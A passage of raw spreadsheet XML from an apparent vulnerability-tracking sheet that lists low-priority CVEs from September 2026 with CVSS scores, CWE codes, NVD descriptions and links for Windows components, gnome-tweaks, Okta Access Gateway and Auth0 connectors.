t="n"><v>0.004</v></c><c r="I1041" s="5" t="inlineStr" /><c r="J1041" s="5" t="inlineStr" /><c r="K1041" s="5" t="inlineStr" /><c r="L1041" s="5" t="inlineStr" /><c r="M1041" s="5" t="inlineStr" /><c r="N1041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1041" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1041" s="5" t="inlineStr" /><c r="R1041" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1041" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1041" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t></is></c></row><row r="1042"><c r="A1042" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1042" s="5" t="inlineStr"><is><t>CVE-2026-71350</t></is></c><c r="D1042" s="5" t="n"><v>6.8</v></c><c r="E1042" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1042" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1042" s="5" t="inlineStr" /><c r="H1042" s="5" t="n"><v>0.004</v></c><c r="I1042" s="5" t="inlineStr" /><c r="J1042" s="5" t="inlineStr" /><c r="K1042" s="5" t="inlineStr" /><c r="L1042" s="5" t="inlineStr" /><c r="M1042" s="5" t="inlineStr" /><c r="N1042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1042" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1042" s="5" t="inlineStr" /><c r="R1042" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1042" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1042" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t></is></c></row><row r="1043"><c r="A1043" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1043" s="5" t="inlineStr"><is><t>CVE-2026-72985</t></is></c><c r="D1043" s="5" t="n"><v>6.8</v></c><c r="E1043" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1043" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1043" s="5" t="inlineStr" /><c r="H1043" s="5" t="n"><v>0.003</v></c><c r="I1043" s="5" t="inlineStr" /><c r="J1043" s="5" t="inlineStr" /><c r="K1043" s="5" t="inlineStr" /><c r="L1043" s="5" t="inlineStr" /><c r="M1043" s="5" t="inlineStr" /><c r="N1043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1043" s="5" t="inlineStr" /><c r="R1043" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1043" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1043" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t></is></c></row><row r="1044"><c r="A1044" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1044" s="5" t="inlineStr"><is><t>CVE-2026-72999</t></is></c><c r="D1044" s="5" t="n"><v>6.8</v></c><c r="E1044" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1044" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1044" s="5" t="inlineStr" /><c r="H1044" s="5" t="n"><v>0.003</v></c><c r="I1044" s="5" t="inlineStr" /><c r="J1044" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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44" s="5" t="inlineStr" /><c r="M1044" s="5" t="inlineStr" /><c r="N1044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1044" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1044" s="5" t="inlineStr" /><c r="R1044" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1044" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1044" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t></is></c></row><row r="1045"><c r="A1045" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1045" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1045" s="5" t="inlineStr"><is><t>CVE-2026-74859</t></is></c><c r="D1045" s="5" t="n"><v>6.8</v></c><c r="E1045" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1045" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1045" s="5" t="inlineStr" /><c r="H1045" s="5" t="n"><v>0.001</v></c><c r="I1045" s="5" t="inlineStr" /><c r="J1045" s="5" t="inlineStr" /><c r="K1045" s="5" t="inlineStr" /><c r="L1045" s="5" t="inlineStr" /><c r="M1045" s="5" t="inlineStr" /><c r="N1045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1045" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1045" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1045" s="5" t="inlineStr" /><c r="R1045" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1045" s="5" t="inlineStr"><is><t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t></is></c><c r="T1045" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t></is></c></row><row r="1046"><c r="A1046" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1046" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1046" s="5" t="inlineStr"><is><t>CVE-2026-77892</t></is></c><c r="D1046" s="5" t="n"><v>6.8</v></c><c r="E1046" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1046" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1046" s="5" t="inlineStr" /><c r="H1046" s="5" t="n"><v>0.003</v></c><c r="I1046" s="5" t="inlineStr" /><c r="J1046" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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46" s="5" t="inlineStr" /><c r="M1046" s="5" t="inlineStr" /><c r="N1046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1046" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1046" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1046" s="5" t="inlineStr" /><c r="R1046" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1046" s="5" t="inlineStr"><is><t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1046" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t></is></c></row><row r="1047"><c r="A1047" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1047" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1047" s="5" t="inlineStr"><is><t>CVE-2026-78451</t></is></c><c r="D1047" s="5" t="n"><v>6.8</v></c><c r="E1047" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1047" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1047" s="5" t="inlineStr" /><c r="H1047" s="5" t="n"><v>0.004</v></c><c r="I1047" s="5" t="inlineStr" /><c r="J1047" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1047"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47" s="5" t="inlineStr" /><c r="M1047" s="5" t="inlineStr" /><c r="N1047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1047" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1047" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1047" s="5" t="inlineStr" /><c r="R1047" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1047" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1047" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t></is></c></row><row r="1048"><c r="A1048" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1048" s="5" t="inlineStr"><is><t>CVE-2026-78579</t></is></c><c r="D1048" s="5" t="n"><v>6.8</v></c><c r="E1048" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1048" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1048" s="5" t="inlineStr" /><c r="H1048" s="5" t="n"><v>0.002</v></c><c r="I1048" s="5" t="inlineStr" /><c r="J1048" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1048" s="5" t="inlineStr" /><c r="L1048" s="5" t="inlineStr" /><c r="M1048" s="5" t="inlineStr" /><c r="N1048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1048" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1048" s="5" t="inlineStr" /><c r="R1048" s="5" t="inlineStr"><is><t>CWE-90</t></is></c><c r="S1048" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize SAML assertion attribute values before interpolating them into LDAP search filters in the LDAP datastore configuration. The raw values are substituted directly into the filter string and passed to the LDAP search operation, resulting in modification of the intended query logic.</t></is></c><c r="T1048" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t></is></c></row><row r="1049"><c r="A1049" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1049" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1049" s="5" t="inlineStr"><is><t>CVE-2026-69350</t></is></c><c r="D1049" s="5" t="n"><v>6.7</v></c><c r="E1049" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1049" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1049" s="5" t="inlineStr" /><c r="H1049" s="5" t="n"><v>0.003</v></c><c r="I1049" s="5" t="inlineStr" /><c r="J1049" s="5" t="inlineStr" /><c r="K1049" s="5" t="inlineStr" /><c r="L1049" s="5" t="inlineStr" /><c r="M1049" s="5" t="inlineStr" /><c r="N1049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1049" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1049" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1049" s="5" t="inlineStr" /><c r="R1049" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1049" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1049" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t></is></c></row><row r="1050"><c r="A1050" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1050" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1050" s="5" t="inlineStr"><is><t>CVE-2026-69373</t></is></c><c r="D1050" s="5" t="n"><v>6.7</v></c><c r="E1050" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1050" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1050" s="5" t="inlineStr" /><c r="H1050" s="5" t="n"><v>0.003</v></c><c r="I1050" s="5" t="inlineStr" /><c r="J1050" s="5" t="inlineStr" /><c r="K1050" s="5" t="inlineStr" /><c r="L1050" s="5" t="inlineStr" /><c r="M1050" s="5" t="inlineStr" /><c r="N1050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1050" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1050" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1050" s="5" t="inlineStr" /><c r="R1050" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1050" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1050" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t></is></c></row><row r="1051"><c r="A1051" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1051" s="5" t="inlineStr"><is><t>CVE-2026-69449</t></is></c><c r="D1051" s="5" t="n"><v>6.7</v></c><c r="E1051" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1051" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1051" s="5" t="inlineStr" /><c r="H1051" s="5" t="n"><v>0.004</v></c><c r="I1051" s="5" t="inlineStr" /><c r="J1051" s="5" t="inlineStr" /><c r="K1051" s="5" t="inlineStr" /><c r="L1051" s="5" t="inlineStr" /><c r="M1051" s="5" t="inlineStr" /><c r="N1051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1051" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1051" s="5" t="inlineStr" /><c r="R1051" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1051" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t></is></c><c r="T1051" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t></is></c></row><row r="1052"><c r="A1052" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1052" s="5" t="inlineStr"><is><t>CVE-2026-69820</t></is></c><c r="D1052" s="5" t="n"><v>6.7</v></c><c r="E1052" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1052" s="5" t="inlineStr" /><c r="H1052" s="5" t="n"><v>0.003</v></c><c r="I1052" s="5" t="inlineStr" /><c r="J1052" s="5" t="inlineStr" /><c r="K1052" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1052" s="5" t="inlineStr" /><c r="M1052" s="5" t="inlineStr" /><c r="N1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1052" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1052" s="5" t="inlineStr" /><c r="R1052" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1052" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1052" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t></is></c></row><row r="1053"><c r="A1053" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1053" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1053" s="5" t="inlineStr"><is><t>CVE-2026-71339</t></is></c><c r="D1053" s="5" t="n"><v>6.7</v></c><c r="E1053" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1053" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1053" s="5" t="inlineStr" /><c r="H1053" s="5" t="n"><v>0.003</v></c><c r="I1053" s="5" t="inlineStr" /><c r="J1053" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K105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53" s="5" t="inlineStr" /><c r="M1053" s="5" t="inlineStr" /><c r="N1053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1053" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1053" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1053" s="5" t="inlineStr" /><c r="R1053" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1053" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1053" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t></is></c></row><row r="1054"><c r="A1054" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1054" s="5" t="inlineStr"><is><t>CVE-2026-72927</t></is></c><c r="D1054" s="5" t="n"><v>6.7</v></c><c r="E1054" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1054" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1054" s="5" t="inlineStr" /><c r="H1054" s="5" t="n"><v>0.003</v></c><c r="I1054" s="5" t="inlineStr" /><c r="J1054" s="5" t="inlineStr" /><c r="K1054" s="5" t="inlineStr" /><c r="L1054" s="5" t="inlineStr" /><c r="M1054" s="5" t="inlineStr" /><c r="N1054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1054" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1054" s="5" t="inlineStr" /><c r="R1054" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1054" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1054" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t></is></c></row><row r="1055"><c r="A1055" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1055" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1055" s="5" t="inlineStr"><is><t>CVE-2026-72935</t></is></c><c r="D1055" s="5" t="n"><v>6.7</v></c><c r="E1055" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1055" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1055" s="5" t="inlineStr" /><c r="H1055" s="5" t="n"><v>0.003</v></c><c r="I1055" s="5" t="inlineStr" /><c r="J1055" s="5" t="inlineStr" /><c r="K1055" s="5" t="inlineStr" /><c r="L1055" s="5" t="inlineStr" /><c r="M1055" s="5" t="inlineStr" /><c r="N1055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1055" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1055" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1055" s="5" t="inlineStr" /><c r="R1055" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1055" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1055" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t></is></c></row><row r="1056"><c r="A1056" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1056" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1056" s="5" t="inlineStr"><is><t>CVE-2026-72948</t></is></c><c r="D1056" s="5" t="n"><v>6.7</v></c><c r="E1056" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1056" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1056" s="5" t="inlineStr" /><c r="H1056" s="5" t="n"><v>0.004</v></c><c r="I1056" s="5" t="inlineStr" /><c r="J1056" s="5" t="inlineStr" /><c r="K1056" s="5" t="inlineStr" /><c r="L1056" s="5" t="inlineStr" /><c r="M1056" s="5" t="inlineStr" /><c r="N1056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1056" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1056" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1056" s="5" t="inlineStr" /><c r="R1056" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1056" s="5" t="inlineStr"><is><t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1056" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t></is></c></row><row r="1057"><c r="A1057" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1057" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1057" s="5" t="inlineStr"><is><t>CVE-2026-78625</t></is></c><c r="D1057" s="5" t="n"><v>6.7</v></c><c r="E1057" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1057" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1057" s="5" t="inlineStr" /><c r="H1057" s="5" t="n"><v>0.002</v></c><c r="I1057" s="5" t="inlineStr" /><c r="J1057" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1057" s="5" t="inlineStr" /><c r="L1057" s="5" t="inlineStr" /><c r="M1057" s="5" t="inlineStr" /><c r="N1057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1057" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1057" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1057" s="5" t="inlineStr" /><c r="R1057" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1057" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t></is></c><c r="T1057" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t></is></c></row><row r="1058"><c r="A1058" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1058" s="5" t="inlineStr"><is><t>CVE-2026-78630</t></is></c><c r="D1058" s="5" t="n"><v>6.7</v></c><c r="E1058" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1058" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1058" s="5" t="inlineStr" /><c r="H1058" s="5" t="n"><v>0.002</v></c><c r="I1058" s="5" t="inlineStr" /><c r="J1058" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1058" s="5" t="inlineStr" /><c r="L1058" s="5" t="inlineStr" /><c r="M1058" s="5" t="inlineStr" /><c r="N1058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1058" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1058" s="5" t="inlineStr" /><c r="R1058" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S1058" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not neutralize shell metacharacters in SNMP configuration values before a privileged script uses them to construct OS commands. An authenticated local user with access to the management interface can supply crafted values, resulting in the execution of arbitrary OS commands with root privileges.</t></is></c><c r="T1058" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t></is></c></row><row r="1059"><c r="A1059" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1059" s="5" t="inlineStr"><is><t>CVE-2026-85981</t></is></c><c r="D1059" s="5" t="n"><v>6.7</v></c><c r="E1059" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1059" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1059" s="5" t="inlineStr" /><c r="H1059" s="5" t="n"><v>0.001</v></c><c r="I1059" s="5" t="inlineStr" /><c r="J1059" s="5" t="inlineStr" /><c r="K1059" s="5" t="inlineStr" /><c r="L1059" s="5" t="inlineStr" /><c r="M1059" s="5" t="inlineStr" /><c r="N1059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1059" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1059" s="5" t="inlineStr" /><c r="R1059" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1059" s="5" t="inlineStr"><is><t>The administrative panel of the Auth0 AD/LDAP Connector (versions 6.5.0 and earlier) listens on the local loopback interface without requiring authentication. This allows a local, low-privileged user or process on the host system to access the panel's management endpoints without credentials. Through these endpoints, a local user can read configuration details, including plaintext Active Directory service account credentials, and modify connector settings.</t></is></c><c r="T1059" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t></is></c></row><row r="1060"><c r="A1060" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1060" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1060" s="5" t="inlineStr"><is><t>CVE-2026-52486</t></is></c><c r="D1060" s="5" t="n"><v>6.6</v></c><c r="E1060" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1060" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1060" s="5" t="inlineStr" /><c r="H1060" s="5" t="n"><v>0.001</v></c><c r="I1060" s="5" t="inlineStr" /><c r="J1060" s="5" t="inlineStr" /><c r="K1060" s="5" t="inlineStr" /><c r="L1060" s="5" t="inlineStr" /><c r="M1060" s="5" t="inlineStr" /><c r="N1060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1060" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1060" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1060" s="5" t="inlineStr" /><c r="R1060" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1060" s="5" t="inlineStr"><is><t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t></is></c><c r="T1060" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t></is></c></row><row r="1061"><c r="A1061" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1061" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1061" s="5" t="inlineStr"><is><t>CVE-2026-69469</t></is></c><c r="D1061" s="5" t="n"><v>6.6</v></c><c r="E1061" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1061" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1061" s="5" t="inlineStr" /><c r="H1061" s="5" t="n"><v>0.004</v></c><c r="I1061" s="5" t="inlineStr" /><c r="J1061" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1061"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61" s="5" t="inlineStr" /><c r="M1061" s="5" t="inlineStr" /><c r="N1061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1061" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1061" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1061" s="5" t="inlineStr" /><c r="R1061" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S1061" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1061" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t></is></c></row><row r="1062"><c r="A1062" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1062" s="5" t="inlineStr"><is><t>CVE-2026-78545</t></is></c><c r="D1062" s="5" t="n"><v>6.6</v></c><c r="E1062" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1062" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1062" s="5" t="inlineStr" /><c r="H1062" s="5" t="n"><v>0.004</v></c><c r="I1062" s="5" t="inlineStr" /><c r="J1062" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1062" s="5" t="inlineStr" /><c r="L1062" s="5" t="inlineStr" /><c r="M1062" s="5" t="inlineStr" /><c r="N1062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1062" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1062" s="5" t="inlineStr" /><c r="R1062" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1062" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx 